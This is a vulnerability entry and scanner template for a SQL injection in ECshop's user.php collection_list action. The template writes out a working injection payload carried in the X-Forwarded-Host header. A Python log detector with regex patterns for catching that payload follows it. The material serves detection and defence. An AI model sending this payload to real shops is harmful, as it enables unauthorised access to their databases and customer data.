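Vulnerability Description
ECshop Collection List contains a SQL injection vulnerability. An attacker can use it to obtain sensitive database information and even execute arbitrary code.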
id: ecshop-collection-list-sqli
info:
  name: ECshop Collection List sqli
  author: 曦shen
  severity: high
  description: |-
    ECshop Collection List 存在 SQL 注入漏洞,攻击者可通过该漏洞获取数据库敏感信息,甚至执行任意代码。
  tags: ecshop,sqli
  created: 2023/10/25
set:
  r1: randomInt(10000, 99999)
rules:
  r0:
    request:
      method: GET
      path: /user.php?act=collection_list
      headers:
        X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_log|s:55:"1' and updatexml(1,insert(md5({{r1}}),1,1,0x7e),1) and '";|45ea207d7a2b68c49582d2d22adf953a
    expression: response.body.bcontains(bytes(substr(md5(string(r1)), 1, 31)))
expression: r0()
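
Added detection example (not part of the original template or of ECshop's code): the rule above carries its payload in the X-Forwarded-Host header, so a log check can flag any value of that header that is not a plain host[:port] and report why. The record layout, field names, addresses and sample values are constructed assumptions.

```python
import re

# A forwarded host should be only host[:port]; bracketed IPv6 is not handled here.
VALID_HOST = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?(?::\d{1,5})?$")
# Shape seen in the rule above: <32 hex><name>|<body>|<same 32 hex>
WRAPPED = re.compile(r"^([0-9a-f]{32})(\w+)\|(.*)\|\1$", re.S)
# updatexml( is the function the rule uses; the quote + AND/OR test is a generic addition.
SQL_HINT = re.compile(r"\bupdatexml\s*\(|['\"]\s*(?:and|or)\b", re.I)


def classify_forwarded_host(value):
    """Return the reasons an X-Forwarded-Host value is suspicious (empty list = clean)."""
    reasons = []
    if not VALID_HOST.match(value):
        reasons.append("not-a-hostname")
    wrapped = WRAPPED.match(value)
    if wrapped:
        reasons.append("marker-wrapped:" + wrapped.group(2))
    if SQL_HINT.search(value):
        reasons.append("sql-token")
    return reasons


def scan(records):
    """Return (src, path, reasons) for every record whose forwarded host is suspicious."""
    hits = []
    for rec in records:
        headers = {k.lower(): v for k, v in rec["headers"].items()}
        value = headers.get("x-forwarded-host")
        reasons = classify_forwarded_host(value) if value is not None else []
        if reasons:
            hits.append((rec["src"], rec["path"], reasons))
    return hits


# Constructed sample records; the marker and the elided SQL body are placeholders.
MARKER = "0123456789abcdef" * 2
SAMPLE_RECORDS = [
    {"src": "192.0.2.10", "path": "/user.php?act=collection_list",
     "headers": {"X-Forwarded-Host": "shop.example.com"}},
    {"src": "192.0.2.11", "path": "/index.php",
     "headers": {"x-forwarded-host": "orders.example.com:8443"}},
    {"src": "198.51.100.7", "path": "/user.php?act=collection_list",
     "headers": {"X-Forwarded-Host":
                 MARKER + 'pay_log|s:3:"x\' and updatexml(...) and \'";|' + MARKER}},
]

if __name__ == "__main__":
    for src, path, reasons in scan(SAMPLE_RECORDS):
        print(src, path, ",".join(reasons))
```

The same hostname check can be enforced at a reverse proxy or WAF by rejecting or overwriting X-Forwarded-Host before the request reaches the application.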